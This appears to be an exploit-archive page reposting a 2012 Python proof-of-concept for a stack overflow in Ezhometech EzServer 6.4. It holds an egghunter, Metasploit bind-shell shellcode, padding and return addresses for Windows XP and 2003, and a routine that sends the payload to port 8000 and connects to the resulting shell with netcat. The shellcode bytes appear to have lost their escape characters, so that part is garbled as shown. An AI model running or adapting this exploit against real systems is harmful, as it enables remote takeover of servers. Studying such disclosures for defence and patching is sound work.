Home / exploits Ezhometech Ezserver 6.4 Stack Overflow
Posted on 19 June 2012
# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability # Author: modpr0be # Contact: research[at]Spentera[dot]com # Platform: Windows # Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn) # Software Link: http://www.ezhometech.com/buy_ezserver.htm # References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/ ### Software Description # EZserver is a Video Server that stream Full HD to various devices. ### Vulnerability Details # Buffer overflow condition exist in URL handling, sending long GET request # will cause server process to exit and may allow malicious code injection. # Further research found that the application does not care about the HTTP method, # so that by sending long characters will make the program crash. ### Vendor logs: # 06/11/2012 - Bug found # 06/12/2012 - Vendor contacted # 06/16/2012 - No response from vendor, POC release. #!/usr/bin/python import sys import struct from socket import * from os import system from time import sleep hunt = ( "x66x81xCAxFFx0Fx42x52x6A" "x02x58xCDx2Ex3Cx05x5Ax74" "xEFxB8x77x30x30x74x8BxFA" "xAFx75xEAxAFx75xE7xFFxE7") #windows/shell_bind_tcp - 751 bytes #http://www.metasploit.com #Encoder: x86/alpha_upper #AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444, shellcode = ("x89xe5xdaxcfxd9x75xf4x5dx55x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx4dx38x4cx49x45x50" "x35x50x53x30x35x30x4bx39x4ax45x36x51x38x52x33" "x54x4cx4bx50x52x56x50x4cx4bx46x32x44x4cx4cx4b" "x30x52x45x44x4cx4bx33x42x37x58x44x4fx38x37x51" "x5ax57x56x50x31x4bx4fx36x51x4fx30x4ex4cx47x4c" "x53x51x43x4cx34x42x46x4cx37x50x49x51x38x4fx54" "x4dx53x31x38x47x4ax42x4ax50x36x32x56x37x4cx4b" "x56x32x44x50x4cx4bx37x32x37x4cx43x31x38x50x4c" "x4bx37x30x33x48x4bx35x59x50x54x34x31x5ax33x31" "x4ex30x36x30x4cx4bx30x48x52x38x4cx4bx56x38x57" "x50x53x31x4ex33x4ax43x57x4cx30x49x4cx4bx50x34" "x4cx4bx53x31x39x46x50x31x4bx4fx36x51x59x50x4e" "x4cx59x51x48x4fx34x4dx45x51x59x57x50x38x4bx50" "x53x45x5ax54x33x33x53x4dx4bx48x47x4bx33x4dx31" "x34x42x55x4ax42x46x38x4cx4bx36x38x31x34x45x51" "x38x53x55x36x4cx4bx54x4cx50x4bx4cx4bx50x58x35" "x4cx43x31x59x43x4cx4bx34x44x4cx4bx35x51x48x50" "x4cx49x31x54x31x34x57x54x51x4bx31x4bx55x31x56" "x39x30x5ax50x51x4bx4fx4dx30x31x48x31x4fx30x5a" "x4cx4bx54x52x5ax4bx4dx56x51x4dx33x58x37x43x47" "x42x45x50x53x30x43x58x34x37x53x43x46x52x31x4f" "x50x54x52x48x30x4cx54x37x46x46x53x37x4bx4fx39" "x45x58x38x4cx50x55x51x43x30x45x50x37x59x58x44" "x46x34x56x30x53x58x31x39x4dx50x32x4bx45x50x4b" "x4fx58x55x36x30x56x30x56x30x46x30x47x30x46x30" "x31x50x46x30x55x38x4ax4ax44x4fx39x4fx4bx50x4b" "x4fx48x55x4dx59x59x57x50x31x59x4bx30x53x55x38" "x55x52x35x50x52x31x51x4cx4bx39x4ax46x32x4ax32" "x30x31x46x50x57x35x38x49x52x59x4bx56x57x53x57" "x4bx4fx39x45x30x53x51x47x52x48x4ex57x4dx39x37" "x48x4bx4fx4bx4fx49x45x51x43x50x53x30x57x35x38" "x44x34x5ax4cx47x4bx4bx51x4bx4fx49x45x56x37x4c" "x49x58x47x43x58x34x35x42x4ex50x4dx53x51x4bx4f" "x58x55x55x38x43x53x52x4dx33x54x55x50x4cx49x4b" "x53x51x47x46x37x31x47x36x51x4cx36x33x5ax42x32" "x31x49x46x36x5ax42x4bx4dx45x36x48x47x47x34x31" "x34x37x4cx55x51x33x31x4cx4dx30x44x47x54x44x50" "x48x46x35x50x30x44x30x54x30x50x46x36x51x46x56" "x36x37x36x46x36x30x4ex31x46x51x46x51x43x31x46" "x32x48x52x59x48x4cx57x4fx4bx36x4bx4fx38x55x4d" "x59x4dx30x50x4ex56x36x51x56x4bx4fx36x50x43x58" "x54x48x4cx47x55x4dx33x50x4bx4fx4ex35x4fx4bx4a" "x50x58x35x4fx52x36x36x53x58x49x36x4dx45x4fx4d" "x4dx4dx4bx4fx58x55x47x4cx43x36x53x4cx35x5ax4d" "x50x4bx4bx4dx30x54x35x55x55x4fx4bx57x37x35x43" "x32x52x52x4fx43x5ax45x50x51x43x4bx4fx4ex35x41" "x41") junk1 = "x41" * 5025 junk2 = "x42" * 5029 junk3 = "x43" * 10000 buff = "w00tw00t" buff+= shellcode buff+= "x90" * 100 buff+= "xebx08x90x90" buff+= struct.pack('<L', 0x10212779) buff+= "x90" * 16 buff+= hunt buff+= "x44" * 5000 def winxp(): try: host = raw_input("[!] Target IP: ") print "[!] Connecting to %s on port 8000" %host s = socket(AF_INET, SOCK_STREAM) s.connect((host,8000)) print "[+] Launching attack.." print "[+] Sending payload.." payload = junk1+buff s.send (payload) s.close() print "[+] Wait for hunter.." sleep(5) print "[+] Connecting to target shell!" sleep(2) system("nc -v %s 4444" %host) except: print "[x] Could not connect to the server x_x" sys.exit() def win2k3(): try: host = raw_input("[!] Target IP: ") print "[!] Connecting to %s on port 8000" %host s = socket(AF_INET, SOCK_STREAM) s.connect((host,8000)) print "[+] Launching attack.." print "[+] Sending payload.." payload = junk2+buff s.send(payload) s.close() print "[+] Wait for hunter.." sleep(5) print "[+] Connecting to target shell!" sleep(1) system("nc -v %s 4444" %host) except: print "[x] Could not connect to the server x_x" sys.exit() def crash(): try: host = raw_input("[!] Target IP: ") print "[!] Connecting to %s on port 8000" %host s = socket(AF_INET, SOCK_STREAM) s.connect((host,8000)) print "[+] Launching attack.." print "[+] Sending payload.." payload = junk3 s.send (payload) s.close() print "[+] Server should be crashed! Check your debugger" except: print "[x] Could not connect to the server x_x" sys.exit() print "#################################################################" print "# EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit #" print "# by modpr0be[at]spentera | @modpr0be #" print "# thanks to: otoy, cikumel, y0k | @spentera #" print "=================================================================" print " 1.Windows XP SP3 (DEP OptIn) bindshell on port 4444" print " 2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444" print " 3.Crash only (debug) " a = 0 while a < 3: a = a + 1 op = input ("[!] Choose your target OS: ") if op == 1: winxp() sys.exit() elif op == 2: win2k3() sys.exit() elif op == 3: crash() sys.exit() else: print "[-] Oh plz.. pick the right one :) "
